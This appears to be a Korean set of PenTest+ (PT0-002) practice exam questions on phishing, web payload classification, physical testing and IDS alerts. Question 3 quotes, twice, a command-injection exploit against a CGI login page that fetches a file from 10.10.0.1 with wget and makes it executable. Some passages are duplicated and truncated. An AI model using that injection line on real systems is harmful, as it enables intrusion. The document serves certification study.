PT0-002 문제 1
활성 서비스 열거 과정에서 침투 테스터는 대상 회사의 서버 중 하나에서 실행 중인 SMTP 데몬을 식별합니다. 다음 중 테스터가 평가 후반 단계에서 피싱을 수행하는 데 가장 적합한 조치는 무엇입니까?
PT0-002 문제 2
귀하는 웹 서버 강화를 담당하는 보안 분석가입니다.
악성으로 표시된 HTTP 페이로드 목록이 제공되었습니다.
지침
다음 공격 서명이 주어지면 공격 유형을 결정한 다음 향후 공격을 방지하기 위해 관련된 수정 조치를 식별합니다.
언제든지 시뮬레이션의 초기 상태를 되돌리려면 모두 재설정 버튼을 클릭하십시오.

악성으로 표시된 HTTP 페이로드 목록이 제공되었습니다.
지침
다음 공격 서명이 주어지면 공격 유형을 결정한 다음 향후 공격을 방지하기 위해 관련된 수정 조치를 식별합니다.
언제든지 시뮬레이션의 초기 상태를 되돌리려면 모두 재설정 버튼을 클릭하십시오.

PT0-002 문제 3
침투 테스터가 익스플로잇을 사용하여 시스템에 액세스할 수 있었습니다. 다음은 사용된 코드 스니펫입니다.
익스플로잇 = "포스트"
익스플로잇 += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} -
c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;$ {IFS
&loginUser=a&Pwd=a"
익스플로잇 += "HTTP/1.1"
다음 중 침투 테스터가 참여 후 실행해야 하는 명령은 무엇입니까?
익스플로잇 = "포스트"
익스플로잇 += "/cgi-bin/index.cgi?action=login&Path=%27%0A/bin/sh${IFS} -
c${IFS}'cd${IFS}/tmp;${IFS}wget${IFS}http://10.10.0.1/apache;${IFS}chmod${IFS}777${IFS}apache;$ {IFS
&loginUser=a&Pwd=a"
익스플로잇 += "HTTP/1.1"
다음 중 침투 테스터가 참여 후 실행해야 하는 명령은 무엇입니까?
PT0-002 문제 4
침투 테스트 팀이 건물에 진입하기 위해 물리적 침투 테스트를 수행하고 있습니다. 다음 중 침투 테스터가 계약 문서 사본을 휴대해야 하는 이유는 무엇입니까?
PT0-002 문제 5
침투 테스터는 간단한 Python 기반 스캐너를 실행했습니다. 다음은 코드 스니펫입니다.

다음 중 이 스크립트가 조직의 IDS에서 'probable port scan' 경고를 트리거한 이유를 가장 잘 설명하는 것은 무엇입니까?

다음 중 이 스크립트가 조직의 IDS에서 'probable port scan' 경고를 트리거한 이유를 가장 잘 설명하는 것은 무엇입니까?

